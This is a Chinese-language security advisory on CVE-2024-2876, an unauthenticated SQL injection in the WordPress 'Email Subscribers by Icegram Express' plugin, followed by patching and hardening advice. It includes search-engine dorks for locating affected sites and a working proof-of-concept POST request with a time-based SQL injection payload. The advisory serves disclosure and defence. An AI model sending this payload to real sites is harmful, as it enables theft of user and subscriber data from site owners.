CVE-2024-2876 是在 WordPress 的 "Email Subscribers by Icegram Express" 插件中发现的一个严重安全漏洞。该漏洞影响直至并包括 5.7.14 的版本,对超过 90,000 个网站构成重大风险。
该漏洞是一个 SQL 注入缺陷,允许未经认证的攻击者在受影响的 WordPress 数据库上执行恶意 SQL 查询。通过操纵未经过适当净化的用户输入,攻击者可以提取敏感信息,如用户名、电子邮件地址、密码哈希和订阅者列表。
SQL 注入发生在插件 IG_ES_Subscribers_Query 类的 run 函数中,不充分的输入验证导致未经授权的 SQL 代码执行。这损害了存储在 WordPress 数据库中数据的完整性和机密性。
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
立即更新:如果您正在使用 "Email Subscribers by Icegram Express" 插件,请立即升级到 5.7.15 或更高版本以应用安全修复。
定期审计:定期审查并更新所有 WordPress 插件和主题到最新版本,以确保安全。
安全插件:使用信誉良好的 WordPress 安全插件来增强对 SQL 注入和其他网络威胁的防御。
强密码策略:为与您的 WordPress 网站相关的所有账户实施强且唯一的密码,以减少未经授权访问的风险。
未能更新受影响的插件会使网站面临数据泄露和未经授权访问的风险。鉴于该插件的广泛使用,立即采取行动对于确保安装安全至关重要。